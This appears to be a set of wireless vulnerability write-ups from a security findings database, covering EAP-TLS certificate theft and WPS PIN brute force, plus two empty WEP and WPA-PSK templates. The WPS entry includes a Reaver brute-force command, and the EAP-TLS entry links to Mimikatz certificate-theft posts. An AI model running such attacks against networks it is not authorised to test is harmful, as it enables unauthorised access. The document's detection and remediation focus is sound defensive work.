--------------------------------------------------------------------------------
/Wireless/EAP-TLS.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: WPA EAP-TLS Mode Certificate Only
 3 | Description: Finding when EAP-TLS is in a mode that only requires a client certificate be present.
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 2015/11/25
 7 | - LAST UPDATED BY: @mubix
 8 | 
 9 | ## Summary
10 | 
11 | EAP-TLS based authentication is the best form of Wireless security currently available because of the need for a client certificate to authenticate to the wireless. However, without additional authentication it is difficult to detect misuse or theft of the client certificate.
12 | 
13 | ## Capabilities and Risk
14 | 
15 | - Theft / Creation of valid certificate used for continued access wireless network
16 | 
17 | ## Detection
18 | 
19 | 1. Use of of client certificates on multiple IP addresses
20 | 2. Reissuance of certificates with export flag enabled
21 | 
22 | ## Remediation
23 | 
24 | 1. Revoke certiicate effected and start investigation into the user(s) effected. Unless re-issued in order to be exportable, administrative access to the machine it was installed on is needed in order to extract the certificate.
25 | 
26 | ## References
27 | 
28 | - Setting up EAP-TLS with Cisco WLC: https://networklessons.com/wireless/peap-and-eap-tls-on-server-2008-and-cisco-wlc/
29 | - Stealing User certificates with Mimikatz:
30 |   - http://carnal0wnage.attackresearch.com/2012/10/more-with-mimikatz-crypto-module.html
31 |   - http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html
32 | - KeyRaider malware steals certificates from iPhone: http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/
33 | 
34 | 
35 | ## Exploitation
36 | 
37 | ### Scenario 1 - Exporting Certificate via Mimikatz
38 | 
39 | ```
40 | Test
41 | ```
42 | 


--------------------------------------------------------------------------------
/Wireless/WEP.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: WEP Encryption Used
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 
 7 | - LAST UPDATED BY: 
 8 | 
 9 | ## Summary
10 | 
11 | A brief summary of the vulnerability
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" becuase of how much context is needed
16 | for a vulnerability to have one which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this vulnerability to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it)
22 | 
23 | ## Detection
24 | 
25 | How does one detect the exploitation of this vulnerability, or detect its presence.
26 | 
27 | ## Remediation
28 | 
29 | What are some of the ways to fix this vulnerability?
30 | 
31 | ## References
32 | 
33 | - Link to blog post
34 | - Link to CVE
35 | - Link to Metasploit module
36 | - Link to Nessus/NeXpose/Qualys write up
37 | 
38 | ## Exploitation
39 | 
40 | A write up on how this vulnerability can be exploited with demo code or screen shots
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/Wireless/WPA-PSK.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: WPA Pre-Shared Key
 3 | Description: Search engine meta data about the finding
 4 | */
 5 | 
 6 | - LAST UPDATED DATE: 
 7 | - LAST UPDATED BY: 
 8 | 
 9 | ## Summary
10 | 
11 | A brief summary of the vulnerability
12 | 
13 | ## Capabilities and Risk
14 | 
15 | This is to replace any "level" or "score" becuase of how much context is needed
16 | for a vulnerability to have one which is beyond the scope of this database.
17 | 
18 | - List of possible uses for this vulnerability to give real-world uses
19 | - Read files as www-data (or use web server is running as)
20 | - DDoS service
21 | - Code execution (for this one to fly there needs to be a refence proving it)
22 | 
23 | ## Detection
24 | 
25 | How does one detect the exploitation of this vulnerability, or detect its presence.
26 | 
27 | ## Remediation
28 | 
29 | What are some of the ways to fix this vulnerability?
30 | 
31 | ## References
32 | 
33 | - Link to blog post
34 | - Link to CVE
35 | - Link to Metasploit module
36 | - Link to Nessus/NeXpose/Qualys write up
37 | 
38 | ## Exploitation
39 | 
40 | A write up on how this vulnerability can be exploited with demo code or screen shots
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/Wireless/WPS.md:
--------------------------------------------------------------------------------
 1 | /*
 2 | Title: Wifi Protected Setup (WPS)
 3 | Description: Pin-based WPS is susceptible to brute force attacks that could allow unauthorized access to WiFi networks. 
 4 | Devices relying on physical methods are vulnerable to physical attacks to allow network access.
 5 | */
 6 | 
 7 | - LAST UPDATED DATE: 12/14/2015
 8 | - LAST UPDATED BY: Joey M. (@l0stkn0wledge)
 9 | 
10 | ## Summary
11 | 
12 | WPS is a feature most often found on home wireless routers; however, due to a large overlap in the home, small office, and
13 | small business markets, the feature has crept into some smaller corporate environments where wireless networks are setup
14 | using more commodity hardware.
15 | 
16 | WPS can pose a variety of risks for wireless network security. The PIN-based method can be vunerable to brute force attacks
17 | over the air. Other types (e.g. push-button methods) would require physical access to the router.
18 | 
19 | ## Capabilities and Risk
20 | 
21 | This would allow an attacker to gain unauthorized access to a wireless network, thereby allowing for additional access
22 | into the network and systems attached to that connection.
23 | 
24 | ## Detection
25 | 
26 | WPS settings can be confirmed by examining the configuration of your wireless router. Button-based WPS methods will have a
27 | button located on the router.
28 | 
29 | ## Remediation
30 | 
31 | Disable WPS on wireless access points. If a device cannot disable WPS, default PIN values should be changed. Physical 
32 | access to the router should be limited and secured to prevent local, physical attacks using WPS.
33 | 
34 | ## References
35 | 
36 | - WPS Wikipedia (https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup)
37 | - Reaver on Google Code (https://code.google.com/p/reaver-wps/)
38 | - Cert Write-up on WPS PIN Vulnerability (http://www.kb.cert.org/vuls/id/723755)
39 | 
40 | ## Exploitation
41 | 
42 | ```
43 | reaver -i [monitor interface number] -b [ESSID] -v
44 | ```
45 | 


--------------------------------------------------------------------------------